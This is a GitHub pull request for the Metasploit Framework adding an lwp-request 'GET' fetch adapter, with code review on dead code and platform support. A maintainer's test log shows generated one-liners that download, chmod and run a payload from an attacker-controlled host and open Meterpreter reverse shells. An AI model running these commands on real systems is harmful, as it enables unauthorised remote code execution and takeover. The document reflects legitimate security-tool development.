Skip to content

Msf::Payload::Adapter::Fetch: Add lwp-request GET fetch adapter #20451

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Msf::Payload::Adapter::Fetch: Add lwp-request GET fetch adapter #20451

wants to merge 1 commit into from

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Aug 5, 2025

See a previous similar rex-exploitation PR here: rapid7/rex-exploitation#22

bcoles
bcoles commented Aug 5, 2025
View reviewed changes
lib/msf/core/payload/adapter/fetch.rb
# There is no way to disable cert check in GET ...
print_error('GET binary does not support insecure mode')
fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
get_file_cmd = "GET -m GET https://#{download_uri}>#{_remote_destination}"
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is dead code as it will never be called. I copied the same code pattern from the wget adapter above (which also contains dead code). Presumably the fail_with was meant to be conditional.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Huh; yes- this came from the certutil command generation. Certutil is a bit of a pain that I don't think you can opt out of the cert check, and this was a way to force the user to accept that limitation, but we don't have that option in here to set. Curious if it was something I forgot to add or something I stripped out after-the-fact.
Regardless, it should not be here, right?
I want to do a check to see if we can set the cert for the httpserver or if certutil simply cannot use https in this case.
#20453

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I copied the same code pattern from the wget adapter above (which also contains dead code)

yes- this came from the certutil command generation.

My mistake - you're right, I copied it from the certutil command generation (not wget).

Regardless, it should not be here, right?

GET has the same limitation as certutil in that insecure certificates cannot be accepted.

This line may be misleading, but leaving it is harmless. The subsequent variable assignment is useless.

I'm fine to leave it in for consistency to be changed when the appropriate functionality is implemented, or change it to a TODO comment.

bcoles
bcoles commented Aug 5, 2025
View reviewed changes
lib/msf/core/payload/adapter/fetch.rb
print_error('GET binary does not support insecure mode')
fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
get_file_cmd = "GET -m GET https://#{download_uri}>#{_remote_destination}"
when 'FTP'
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

FTP code path has not been tested.

It looks like this is supposed to be based on fetch_protocol, but I found no way to control this from within msfconsole.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I noticed that we don't have an FTP fetch server recently..... it is on my list of cleanup tasks.

@msutovsky-r7 msutovsky-r7 self-assigned this Aug 7, 2025
@msutovsky-r7
Copy link
Contributor 

msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
GET -m GET http://192.168.3.7:8080/EO6WzfXF6CGyqdBiy1rT5w>./MLSDZDNWR;chmod +x ./MLSDZDNWR;./MLSDZDNWR&
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.3.7:4444 
[*] Sending stage (3090404 bytes) to 10.5.134.150
[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.134.150:37020) at 2025-08-07 14:47:15 +0200

msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > sessions 

Active sessions
===============

  Id  Name  Type                   Information             Connection
  --  ----  ----                   -----------             ----------
  1         meterpreter x64/linux  msfuser @ 10.5.134.150  192.168.3.7:4444 -> 10.5.134.150:370
                                                           20 (10.5.134.150)

msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
getuidComputer     : 10.5.134.150
OS           : Ubuntu 22.04 (Linux 6.8.0-1031-azure)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser

msf payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > generate -f raw 
GET -m GET http://192.168.3.7:8080/God8ZegEq240xmv_PfQwmA>./jACOtFIlh;chmod +x ./jACOtFIlh;./jACOtFIlh&
msf payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 3

msf payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > [*] Started reverse TCP handler on 192.168.3.7:4242 
[*] Meterpreter session 2 opened (192.168.3.7:4242 -> 10.5.134.150:60588) at 2025-08-07 14:53:27 +0200

msf payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > sessions 

Active sessions
===============

  Id  Name  Type                   Information             Connection
  --  ----  ----                   -----------             ----------
  2         meterpreter x64/linux  msfuser @ 10.5.134.150  192.168.3.7:4242 -> 10.5.134.150:605
                                                           88 (10.5.134.150)

msf payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 10.5.134.150
OS           : Ubuntu 22.04 (Linux 6.8.0-1031-azure)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser

msutovsky-r7
msutovsky-r7 reviewed Aug 7, 2025
View reviewed changes
lib/msf/core/payload/adapter/fetch.rb
def _generate_get_pipe
# Specifying the method (-m GET) is necessary on OSX
execute_cmd = 'sh'
execute_cmd = 'cmd' if windows?
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If I understand correctly, GET is only supported by Linux - does this make sense here? Or is it for sake of keeping the pattern?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If I understand correctly, GET is only supported by Linux - does this make sense here? Or is it for sake of keeping the pattern?

It is largely for keeping the pattern. I don't think this conditional will ever be called, as GET is listed only for Linux options (lib/msf/core/payload/adapter/fetch/linux_options.rb) but not Windows options (lib/msf/core/payload/adapter/fetch/windows_options.rb).

GET is supported by Linux and Mac OSX and likely by any other UNIX derived platform which supports Perl and lwp-request. I'm not sure if lwp-request supports Windows (outside of WSL), but it's written in Perl, so maybe. In the event that GET does run on Windows, piping to cmd (as defined here) should work.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

@msutovsky-r7 msutovsky-r7 msutovsky-r7 left review comments

At least 1 approving review is required to merge this pull request.

Assignees

@msutovsky-r7 msutovsky-r7

Labels
enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@bcoles @msutovsky-r7 @bwatters-r7